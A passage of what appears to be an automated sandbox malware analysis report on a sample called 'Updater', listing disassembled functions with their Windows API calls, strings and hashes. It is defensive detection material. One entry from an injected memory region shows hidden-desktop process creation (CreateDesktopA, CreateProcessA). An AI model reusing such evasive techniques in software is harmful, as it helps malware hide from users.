Function 007156F9 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 007156F9
GetDC.USER32(00000000), ref: 00715703
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0071570F
ReleaseDC.USER32(00000001), ref: 00715730

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: d56da2296944b941a0d5162e67ecf0b46acc0443004347877910187d89ead540
Instruction ID: e9976ac9c7159b05f5aaf5bcd4503807b1e6a3fe936a44712db7b06768847542
Opcode Fuzzy Hash: d56da2296944b941a0d5162e67ecf0b46acc0443004347877910187d89ead540
Instruction Fuzzy Hash: F2E0E5B1E10300EFCB61AFA0D80865DBBB2AB48360F11C049E80AA3320DBB89A419F05

Function 006FE11D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 006FE1AD

Strings

pow, xrefs: 006FE185, 006FE1A2

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 12976764c7d3f4f15ba7987ac2d346af699ab096b54b423e010b69116eff9247
Instruction ID: bdca97e47f481e08dd1584d4d1d1ea189cb2206ae8532297f9da76d47ba69dbd
Opcode Fuzzy Hash: 12976764c7d3f4f15ba7987ac2d346af699ab096b54b423e010b69116eff9247
Instruction Fuzzy Hash: D7518A71E0C105D6E729B714C9413BA3FE99B40741F208E68E185823F9EB3E9CD1DA9A

Function 006DC9A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 006DC9B1
GlobalMemoryStatusEx.KERNEL32(?), ref: 006DC9CA

Strings

@, xrefs: 006DC9BE

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 276686dfcf6cbc214f22dddeb904c5d4682c8039857f5f3d29e8c76c7b3afee1
Instruction ID: 0679bf75d62e888ad2c2198b8d68df643a397f0f7948a81103b18d8999d05277
Opcode Fuzzy Hash: 276686dfcf6cbc214f22dddeb904c5d4682c8039857f5f3d29e8c76c7b3afee1
Instruction Fuzzy Hash: 345149729187459BD360AF10D896BAFBBF8FF94300F51884EF1D841295EB708529CB6B

Function 0075630A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 007563A7
_wcslen.LIBCMT ref: 007563B2

Strings

CALLARGARRAY, xrefs: 007563AD, 007563BE

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 1c2da81b9e9385e43133a8be01f287222feebf3c333589d31fefe192b5d4846d
Instruction ID: 4302e4217ed82db3fb3ab31bf0102fa7a93adfafabce831bcd8620eb29290b00
Opcode Fuzzy Hash: 1c2da81b9e9385e43133a8be01f287222feebf3c333589d31fefe192b5d4846d
Instruction Fuzzy Hash: 49418E71E002189BCF50EF58C885AFEB7B1EF19314F808169ED15AB391D7B99D49CB90

Function 0073D166 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0073D210

Strings

p)z, xrefs: 0073D195
0, xrefs: 0073D1CE

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: InfoItemMenu
String ID: 0$p)z
API String ID: 1619232296-3895728235
Opcode ID: 2f8405fc63394cf900d9868b036b07065364f7eecd21da404105c32d7a96ae12
Instruction ID: 55998b2014f91992e306caaed9179ce147d6695239c97a681ca6156150c11785
Opcode Fuzzy Hash: 2f8405fc63394cf900d9868b036b07065364f7eecd21da404105c32d7a96ae12
Instruction Fuzzy Hash: 8731F3B290021A9BFB24DFA8E8417EEBBA5FB09350F144128F951E7283D778DD04CB90

Function 00764F02 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00764FEE
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00765003

Strings

', xrefs: 00764F5D

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 5c09674a4352c9f4cce065ae23dab4b4d395ca67b409dbf5f1bed1d72ed462af
Instruction ID: 34ad43992da7b4e8450acbfe88852dcc16962fa0e1605c450b0e967761e2d336
Opcode Fuzzy Hash: 5c09674a4352c9f4cce065ae23dab4b4d395ca67b409dbf5f1bed1d72ed462af
Instruction Fuzzy Hash: 2B411874A0130A9FDB14CFA9C880BEABBB5FF49300F14416AED06AB351D775A951DF90

Function 014A56D1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,014A57AF), ref: 014A5757
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,014A57AF), ref: 014A575D

Strings

yyyy, xrefs: 014A5732

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: f45a4d64bcd8fcc8532352b08074a8d74506780d779907cb28ddf37843fd6b71
Instruction ID: 3ba99195a2049d160b5060808e9cf5962ea3d8980baf518551f0e7170df2d26f
Opcode Fuzzy Hash: f45a4d64bcd8fcc8532352b08074a8d74506780d779907cb28ddf37843fd6b71
Instruction Fuzzy Hash: A621327D600209DFDB11EB99D941A9E77B8EF38710F92046BF905EB360D6709E04C661

Function 007640A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 006E4570: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006E45AE
Part of subcall function 006E4570: GetStockObject.GDI32(00000011), ref: 006E45C2
Part of subcall function 006E4570: SendMessageW.USER32(00000000,00000030,00000000), ref: 006E45CC

GetWindowRect.USER32(00000000,?), ref: 00764110
GetSysColor.USER32(00000012), ref: 0076412A

Strings

static, xrefs: 007640ED

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 731f599e0aaa93275500bd88fd5b892d145f6946f49b32c2a17988ec112f0c5b
Instruction ID: de085bf74bcb01ebb178f9d09a6717fcdd3728f66a9465d1d62ee413368e3014
Opcode Fuzzy Hash: 731f599e0aaa93275500bd88fd5b892d145f6946f49b32c2a17988ec112f0c5b
Instruction Fuzzy Hash: A3212972A1020AAFDB10DFA8CC45AFA7BF8EB19314F014615FD5AD3150E639E8619B60

Function 0073D287 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 0073D319

Strings

0, xrefs: 0073D2F0
p)z, xrefs: 0073D2C3

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: InfoItemMenu
String ID: 0$p)z
API String ID: 1619232296-3895728235
Opcode ID: c4bcc389855192296701e91a3a8351e418eb8341d9bdd44b03f76b7c4d24b28e
Instruction ID: b15892071f0c11c6334e396ec6de96707aabae7f911036d6c9f01031ba44a8a0
Opcode Fuzzy Hash: c4bcc389855192296701e91a3a8351e418eb8341d9bdd44b03f76b7c4d24b28e
Instruction Fuzzy Hash: 3511E672D05218EBEB31EB5CF844BDE77B9AB46310F044125ED11A7292E338EE05C796

Function 014B5DED Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(00000000,OPEN,00000000,00000000,00000000), ref: 014B5E64

Part of subcall function 014B5BC9: CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 014B5C93
Part of subcall function 014B5BC9: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,014B5DC2), ref: 014B5CD4

Strings

.exe, xrefs: 014B5E18
OPEN, xrefs: 014B5E5D

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: Create$DesktopExecuteProcessShell
String ID: .exe$OPEN
API String ID: 1246678638-879745837
Opcode ID: 56dafcec7fc2b0112c6282fca053bcafd7fc83ab1272323219f6b26029085866
Instruction ID: 320229c5339f8116905e3955ffff5d30690e315afd498002cc86a8bc637710b6
Opcode Fuzzy Hash: 56dafcec7fc2b0112c6282fca053bcafd7fc83ab1272323219f6b26029085866
Instruction Fuzzy Hash: 510192743043057FE710ABAA8C81B9AA69CDB7CA20F62847FB505EB361DAB49D018574

Function 00732E06 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

Part of subcall function 00734D36: GetClassNameW.USER32(?,?,000000FF), ref: 00734D59

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00732E74

Strings

ComboBox, xrefs: 00732E13
ListBox, xrefs: 00732E3E

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 10fa3c7ed5dbee002a19b69a01695b90ae708b1dbb8cf8fc00e620fae9f935c7
Instruction ID: 8223e4f2f55f95273d06f4bc22cd087c9cefed76fb067ccf3f8058901b0f36da
Opcode Fuzzy Hash: 10fa3c7ed5dbee002a19b69a01695b90ae708b1dbb8cf8fc00e620fae9f935c7
Instruction Fuzzy Hash: 26012871A40219AB9F54EBA0CC5ADFE736AAF12320F040B1EFC63533D3DE3958088660

Function 00732CFE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

Part of subcall function 00734D36: GetClassNameW.USER32(?,?,000000FF), ref: 00734D59

SendMessageW.USER32(?,00000180,00000000,?), ref: 00732D6C

Strings

ComboBox, xrefs: 00732D0B
ListBox, xrefs: 00732D36

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 892110765abab09b9088852433e0a2693d39e38a594caa42264ffa90d082fa23
Instruction ID: 5bb126515b66582b964961e9bfcf6d3c4b9ea3b9a91e6a4691b3c01333c9f6ed
Opcode Fuzzy Hash: 892110765abab09b9088852433e0a2693d39e38a594caa42264ffa90d082fa23
Instruction Fuzzy Hash: 2501F771B50109ABDF54EBA0C956AFF73A99F11340F10012AB90763293DA295E0982B5

Function 00732D83 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006DFA3B: _wcslen.LIBCMT ref: 006DFA45

Part of subcall function 00734D36: GetClassNameW.USER32(?,?,000000FF), ref: 00734D59

SendMessageW.USER32(?,00000182,?,00000000), ref: 00732DEF

Strings

ComboBox, xrefs: 00732D90
ListBox, xrefs: 00732DBB

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: b2ef15ecd0ed6a7d6a1eef5ac385b17240eb29752eac364dd2f83478d07b1803
Instruction ID: ded519a98ab0dff39446f8eae442c38ac16487487d22a4ec3b26ec91ece34410
Opcode Fuzzy Hash: b2ef15ecd0ed6a7d6a1eef5ac385b17240eb29752eac364dd2f83478d07b1803
Instruction Fuzzy Hash: 160126B1B51109B7DF54E7A4C956AFF73AD9B01340F10012ABC0773393DA295E0992B5

Function 00736FA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00736FEB

Part of subcall function 007372DF: VariantInit.OLEAUT32(00000000), ref: 00737347
Part of subcall function 007372DF: VariantCopy.OLEAUT32(00000000,?), ref: 00737351

VariantClear.OLEAUT32(?), ref: 0073700F

Strings

Dw, xrefs: 00736FCE

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Variant$Init$ClearCopy
String ID: Dw
API String ID: 1426616791-3024475581
Opcode ID: f4be62d322e1eecad8071ec38eed6c3470f94c6d7c768a5f76def2fbae17d2a5
Instruction ID: c4e720e0c115cd8518a4131e204af2af9c9321408f03eff20e8501b398d70be1
Opcode Fuzzy Hash: f4be62d322e1eecad8071ec38eed6c3470f94c6d7c768a5f76def2fbae17d2a5
Instruction Fuzzy Hash: 45111EB29003099FC720DF99D88489AFBF8FB18310B10866FE94A97611D775AA44CF94

Function 0073EF07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 0073EF22
IsWindowVisible.USER32(?), ref: 0073EF2D

Strings

4z, xrefs: 0073EF5A

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: MessageSendTimeoutVisibleWindow
String ID: 4z
API String ID: 2309912316-4023123785
Opcode ID: d19de0f47ec925be39e0625b39f0eb7537732e27f3641a16ee92678ae64c994c
Instruction ID: 912279e3eabfcf1e759d69a4f73dd1d49e9ea7bf697c07db5afb27ccdb434ea4
Opcode Fuzzy Hash: d19de0f47ec925be39e0625b39f0eb7537732e27f3641a16ee92678ae64c994c
Instruction Fuzzy Hash: 34016771A00119ABEB50EB60CD45DFF776D9B15740F404076F806E2281DB689F0587E6

Function 00715494 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 007154A7
FreeLibrary.KERNEL32 ref: 007154CD

Strings

GetSystemWow64DirectoryW, xrefs: 007154A1

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW
API String ID: 3013587201-1150568532
Opcode ID: 693d529276ed38aff988f4645f0105926ee7686b8d7cec1650262372de4c2c7f
Instruction ID: 55321db11a3a66eec34b64aad76a868ec5e1bbdd6c4b3c49fe2c834eedc8c71a
Opcode Fuzzy Hash: 693d529276ed38aff988f4645f0105926ee7686b8d7cec1650262372de4c2c7f
Instruction Fuzzy Hash: A0E0DFB1E12E26D7C77D96684C84AED22266F52745F058011FD03EA280EBBCCE844690

Function 006F1311 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 006EFF7F: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006F1340,?,?,?,006D100A), ref: 006EFF84

IsDebuggerPresent.KERNEL32(?,?,?,006D100A), ref: 006F1344
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,006D100A), ref: 006F1353

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006F134E

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 86b52f88f1f64f5cdc7f1a29b4d3baa5fd25ecfa82906631851e435801ed9522
Instruction ID: de6051359c5d134e129eca064f8d531ddf80ab00fca75c78c279282c8668e5db
Opcode Fuzzy Hash: 86b52f88f1f64f5cdc7f1a29b4d3baa5fd25ecfa82906631851e435801ed9522
Instruction Fuzzy Hash: 04E06D71600345CFD7709F29D808756BBE5BB12780F04C92DE586C6A81D7F8E4448BE1

Function 00762C7A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00762C90
PostMessageW.USER32(00000000), ref: 00762C97

Part of subcall function 0073F7F5: Sleep.KERNEL32 ref: 0073F86D

Strings

Shell_TrayWnd, xrefs: 00762C89

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: a223d4121ecceae19de44db96e23bf4e40105145bb5281124641b30db44dd4b0
Instruction ID: 3e8b46df471a295df30b454188b363a79375bbaac3adc2e8d8842f9efd9f7c16
Opcode Fuzzy Hash: a223d4121ecceae19de44db96e23bf4e40105145bb5281124641b30db44dd4b0
Instruction Fuzzy Hash: DDD0A932B94302ABF678B730EC0FFC36A109B08B80F000821F206AA0C1C8E8AC00C648

Function 00762C46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00762C50
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00762C63

Part of subcall function 0073F7F5: Sleep.KERNEL32 ref: 0073F86D

Strings

Shell_TrayWnd, xrefs: 00762C49

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

